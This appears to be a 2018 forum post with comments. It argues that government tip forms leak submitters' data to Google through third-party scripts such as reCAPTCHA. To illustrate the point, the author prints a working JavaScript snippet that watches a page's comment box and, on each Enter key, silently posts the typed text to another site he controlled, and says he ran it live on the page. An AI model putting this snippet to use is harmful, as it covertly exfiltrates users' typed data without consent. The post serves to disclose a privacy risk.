FBI leaks all tips online to Google, endangering anyone who submits a tip


2018 Feb 2, 9:27am   6,846 views  37 comments

by Patrick

Summary: our government agencies at both the state and federal level are irresponsibly giving Google access to what should be citizens' private information.

The FBI has a form for reporting tips, here:

https://tips.fbi.gov/

Unfortunately, that FBI form includes a reCAPTCHA from Google, which is used to prove you are a human being and not a robot.



You can verify that the FBI tip site is loading the recaptcha script from Google and not from its own servers by doing a "view source" in your browser on the tips.fbi.gov page and seeing this:

src="https://www.google.com/recaptcha/api/challenge?k=6LfDkLwSAAAAAD4IfxM2UpXo_jrotbWHVPWLwZVN&hl=en"

Including that script gives Google the easy ability to capture all the tip data that anyone submits to the FBI. A script pulled in with a <script src="..."> tag is not sandboxed: the browser runs it in the FBI page's own origin, with the same privileges as the FBI's own code, so it can read every form field, watch every keystroke, and send whatever it sees to any server it likes. Nobody at the FBI can review what that script does from one day to the next, because Google serves it and can change it at any time. In addition to the tip itself, the data exposed this way includes:

Your First Name
Your Last Name
Your Middle Name
Your Phone
Your Email
Your Street 1
Your Street 2
Your Suite/Apt/Mail Stop
Your City
Your State

Even if you lie on the form about those things, it's not hard for Google to know who you really are. Just loading the script sends Google your IP address, your browser's User-Agent string (make, model and version) and any google.com cookies already in your browser, before you have typed a word. Google most likely has an extensive profile of you already from your phone usage (if you have an Android phone) and from your searching and surfing habits online.

This is extremely bad for the privacy of people submitting tips to the FBI and could put their lives in danger.

To illustrate the danger, I wrote this little script:


// Runs once the page's DOM is ready, just as an included third-party script would.
document.addEventListener("DOMContentLoaded", function(event) {
  // The comment form's submit link on this page; its href is reused as the
  // path to post to on the other site.
  const path = document.getElementById('accept_comment').getAttribute('href')
  const textarea = document.querySelector('textarea')
  textarea.onkeyup = function(evt) {
    if (evt.keyCode == 13) { // return key
      console.log('sending fbi tip back to evil spying company, ha ha ha!')
      // Cross-origin POST. 'no-cors' means the browser sends it without any
      // permission from sftech.fun; the response is opaque, but the data has
      // already left the page by then.
      fetch('https://sftech.fun/' + path.replace(/^\//, ''), {
        method: 'POST',
        mode: 'no-cors',
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
        body: 'comment_post_id=1275699&comment_content=' +
              encodeURIComponent(textarea.value)
      })
    }
  }
})


Then I included it on this very page (do a 'view source' and look for spy_on_fbi.js) in just the same way that the FBI includes Google's reCAPTCHA. My little script will spy on every comment entered on this page, and copy it over to a page on a different website of mine, at http://sftech.fun/post/1275699 . It won't even wait until you submit a comment, but will copy over what you're writing in the comment box at the bottom of this page every time you hit the enter key.

(Note added Tue 20 Mar 2018: disabled the spying for now, since I took down sftech.fun to save money - still happy to illustrate the principle to interested reporters though. Write p@patrick.net )

Please tell reporters about this. Other government agencies are also unwittingly offering great quantities of personal information about you to Google by including Google scripts, such as:

https://www.coveredca.com/
http://www.edd.ca.gov/
https://www.ice.gov/webform/hsi-tip-form (leaking via Google analytics script)
(let me know about others you find)

Comments 1 - 37 of 37

1   MrMagic   2018 Feb 2, 9:32am  

Patrick says
So Google knows


I thought Google knows every time you touch your keyboard or touch screen?

Patrick says
This is extremely bad for the privacy of people


Very true!
2   Patrick   2018 Feb 2, 9:35am  

One way to get a bit of privacy is to add these lines to the /etc/hosts file on your Mac or Linux computer (probably there is some similar file on Windows):


## CUSTOM BLOCKING
127.0.0.1 google.com
127.0.0.1 www.google.com
127.0.0.1 ssl.google-analytics.com
127.0.0.1 google-analytics.com
127.0.0.1 www.google-analytics.com
127.0.0.1 maps.google.com
127.0.0.1 images.google.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com
127.0.0.1 staticxx.facebook.com


What that does is direct all use of those Google and Facebook domains to 127.0.0.1, which is simply your own computer, aka "localhost".

You'll quickly discover just how many government sites are sending your info to Google and Facebook by finding that they don't work with those /etc/hosts settings.
3   anonymous   2018 Feb 2, 1:34pm  

You think that's bad, I can't log into patrick.net from my job, as google would find out where I work. I used a gmail account when you implemented the new login system as I didn't realize I'd have to authenticate all the hosts that I use to access this forum.
4   Patrick   2018 Feb 2, 1:47pm  

You can just comment anonymously, like you did just now. No account required.

I don't use Google Recaptchas, or any Google software, but YouTube videos embedded in posts or comments do come from Google because they own YouTube.
5   Patrick   2018 Feb 2, 1:58pm  

Please upvote this very story on HackerNews: https://news.ycombinator.com/item?id=16294534
6   WookieMan   2018 Feb 2, 2:01pm  

Patrick says
Please upvote this very story on HackerNews: https://news.ycombinator.com/item?id=16294534


Not sure if it's something on my end. Site loads, but no content or story.
7   Patrick   2018 Feb 2, 2:16pm  

Hmmm, interesting. I can see it when logged in to hackernews, but not in incognito mode. Not even when I search for it:

https://hn.algolia.com/?query=fbi&sort=byDate&prefix=false&page=0&dateRange=last24h&type=story

Maybe it has to pass some censor first?

Also please upvote this:

https://www.reddit.com/r/government/comments/7uv0ry/if_you_submit_a_tip_to_the_fbi_google_knows_about/
8   Patrick   2018 Feb 27, 9:18pm  

I updated this post to illustrate just how irresponsible the FBI is being. Now every time you hit enter in this comment box, the comment will be copied over to http://sftech.fun/post/1275699
9   anonymous   2018 Feb 28, 12:55am  

FYI there is a windows HOSTS file, you should start with this one: http://winhelp2002.mvps.org/hosts.htm
10   anonymous   2018 Feb 28, 6:39am  

WOW, I really love what you did with this post Patrick. I am smarter having read this. Great job.
11   bob2356   2018 Feb 28, 10:25am  

rando says
One way to get a bit of privacy is to add these lines to the /etc/hosts file on your Mac or Linux computer (probably there is some similar file on Windows):


## CUSTOM BLOCKING
127.0.0.1 google.com
127.0.0.1 www.google.com
127.0.0.1 ssl.google-analytics.com
127.0.0.1 google-analytics.com
127.0.0.1 www.google-analytics.com
127.0.0.1 maps.google.com
127.0.0.1 images.google.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com
127.0.0.1 staticxx.facebook.com


You can look at web sites like http://someonewhocares.org/hosts/ that provide hosts files that block all kinds of nasties like adware. My hosts file runs something like 20 pages.
12   Hircus   2018 Feb 28, 1:47pm  

I agree, google could modify their code to harvest said information, but they currently don't.

But, I'm not sure this is any more dangerous than using a computer period. If you use windows/linux/mac, on any day a software update can come in that will start harvesting everything you type, and send it back to their mothership. Same goes for every web browser - they can easily capture everything you do.

Whether it be adding such capturing code to recaptcha, the OS, or a browser, they would probably get away with it for a while until someone notices and sounds the alarm. But, the repercussions would be grave for any big US company like Google/Microsoft.

btw - for those who aren't software developers: most of the web includes code that is loaded from other websites (it's usually related to advertising, analytics, social media, and content sharing). They all have the power to do this - go rogue (delivering an on-the-fly software update that you have no clue occurred) and start harvesting everything you type and/or see on that page. Your anti-virus won't help. The state of web security is a sad one, but it's reality.
13   Patrick   2018 Feb 28, 2:32pm  

goat says
I agree, google could modify their code to harvest said information, but they currently don't.


What makes you sure that they don't?

They have the means, the motive, and the opportunity.
14   Patrick   2019 Mar 25, 8:32pm  

Bumping this just because it's been more than a year and Google still has access to all tips submitted to the FBI tip site.
15   FortWayneAsNancyPelosiHaircut   2019 Mar 25, 8:34pm  

Sounds like FBI people know nothing about privacy. Government employees...
16   zzyzzx   2019 Mar 26, 7:45am  

Go to a public library, and use their computers to submit a tip.
17   Patrick   2019 Mar 26, 7:57am  

Yes, going to a library is a reasonable way to deal with this case.

Mostly, I just want to publicize the fact that our government is leaking private information to Google all the time, from most of their websites.
18   SunnyvaleCA   2019 Mar 26, 8:21am  

Hmm... I thought scripts loaded from a different domain than the main page are sandboxed so they can't see the data of the main page. Isn't this the whole "cross site scripting" vulnerability?
19   Tenpoundbass   2019 Mar 26, 8:25am  

There's no need for that, all that is needed is form obfuscation and encrypting the values using a session values with Ticks.
A bot can't post a form at a future date because its form names won't match the current session tick value.
20   MisdemeanorRebel   2019 Mar 27, 7:19pm  

Newspeak being promulgated:

21   Ceffer   2019 Mar 28, 1:28am  

If I leave a tip on the FBI site that Herbert Hoover was really gay and blackmailed by the mafia, would my secret file get fatter?
22   Patrick   2022 Apr 12, 5:00pm  

https://reclaimthenet.org/government-websites-google-tracking-code/?source=patrick.net

So now a few other people are noticing Google Analytics on government websites. It's just the tip of the iceberg, and boy are they late to notice.
23   FortWayneAsNancyPelosiHaircut   2022 Apr 12, 5:22pm  

I'm not drunk, but I am about to submit a tip that Biden stole the election. I have all the videos from the trials saved, that's my evidence.
24   HeadSet   2022 Apr 13, 11:20am  

MisdemeanorRebel says
Newspeak being promulgated:


That is some strange reasoning they use here. They are essentially saying "Illegals are not a burden on SS, as illegals are effectively slaves."
25   FortWayneAsNancyPelosiHaircut   2022 Apr 13, 1:14pm  

FortWayneAsNancyPelosiHaircut says
I'm not drunk, but I am about to submit a tip that Biden stole the election. I have all the videos from the trials saved, that's my evidence.


Submitted this yesterday. I doubt they'll contact me. Upon submission there is a nice message saying that they don't contact most people for submitting tips. I recommend everyone files tips for "stolen election", let those people do actual work and not entrap random Americans for the shits and giggles.
26   Robber Baron Elite Scum   2022 Apr 13, 4:05pm  

Snitches deserve stitches

Even Google agrees
27   AmericanKulak   2022 Apr 13, 4:28pm  

HeadSet says
That is some strange reasoning they use here. They are essentially saying "Illegals are not a burden on SS, as illegals are effectively slaves."


The part they leave out is: Any and all amnesties make them qualify for Soc Sec, and Dems have been talking about this for years now. So all the 30-40 something unskilled workers getting busted backs and wearing out, will be on SS disability if the Dems possibly can.
28   stereotomy   2022 Apr 13, 4:47pm  

Robber Baron Elite Scum says
Snitches deserve stitches

Even Google agrees


He returns! I've been trying to channel you in your absence. So glad I can lay down the mantle.

Seriously, glad to see you back.
29   SunnyvaleCA   2022 Apr 13, 5:12pm  

Patrick says
Summary: our government agencies at both the state and federal level are irresponsibly giving Google access to what should be citizens' private information.

It's only fair... Google gives the government agencies access to all your private data (GMail, Google Docs, etc). One good deed deserves another and all that.
30   Patrick   2022 Apr 26, 1:00pm  

https://reclaimthenet.org/google-project-whose-data-collection-could-help-saudi-arabia-assassins/?source=patrick.net


Investors raise alarm on Google project whose data collection could help Saudi Arabia assassins

“The Saudi Arabian government will stop at no end to snuff out anyone who dares challenge their autocratic rule and human rights abuses,” said SumOfUs campaign director Rewan Al-Haddad.

“Google is sidestepping its own human rights standards in favor of growth and profits, and while that’s not necessarily shocking, it puts the lives of activists and dissidents in the region at serious risk,” Al-Haddad added. “A Google cloud center under Saudi’s jurisdiction would basically serve our sensitive data on a silver platter to Saudi’s top hitmen.”
31   Patrick   2022 Jun 18, 4:23pm  

https://reclaimthenet.org/meta-is-sued-for-collecting-data-on-hospital-patients/


Meta has been sued over allegations that sensitive medical data is shared secretly with Facebook when patients access the portals of some health-care centers.

The basis of the lawsuit is Pixel, a tracking tool owned by Facebook. The tool redirects patients’ private data without consent, which is a violation of state and federal laws, according to the lawsuit filed in a San Francisco federal court. The unidentified complainant is proposing a class action on behalf of millions.

https://docs.reclaimthenet.org/Doe-v-Meta-Platforms-FB-Tracking-Pixels.pdf


Similar to how most websites leak your data to Google by including Google APIs. Even health sites and some banks.

Wonder if I could start a lawsuit about that.
32   1337irr   2022 Jun 18, 4:33pm  

You probably could Patrick. Have you ever been involved in any lawsuit/legal matter?

I somewhat was...they are expensive and scary.
33   Patrick   2022 Jun 18, 4:35pm  

Nothing outside of small claims. Given that Google is a rich company and has willfully and blatantly violated the privacy of billions of people, maybe some law firm would be interested.
34   1337irr   2022 Jun 18, 4:44pm  

Well, it doesn't hurt to shop around if you have a case. I am sure you could get something going.

I worked with a lawyer who wanted $25k to take the matter to court if needed, but a cease and desist letter sufficed.
35   Ceffer   2022 Jun 18, 7:09pm  

Can I report people or neighbors I don't like as being present in halls of Congress on Jan 6., just like the good ole days of Soviet Russia where even a whisper would get somebody gulag'd?
36   Misc   2022 Jun 19, 2:33am  

I am certain that Google and its affiliated governments/businesses would be able to come up with something on any lawyer/law firm that you can contact.
37   Patrick   2022 Jun 25, 5:16pm  

https://reclaimthenet.org/italian-regulator-rules-google-analytics-use-illegal/


Italian regulator rules Google Analytics use illegal
Not compatible with data protection laws.

Garante Privacy made this decision after examining the case involving a web publisher, Caffeina Media, who uses Google Analytics. The data in question reveals IP address, type of OS, browser details, language, and date and time of visit to the site.


They are severely understating the invasiveness of including 3rd party javascript, which can inherently read and change anything on the page.
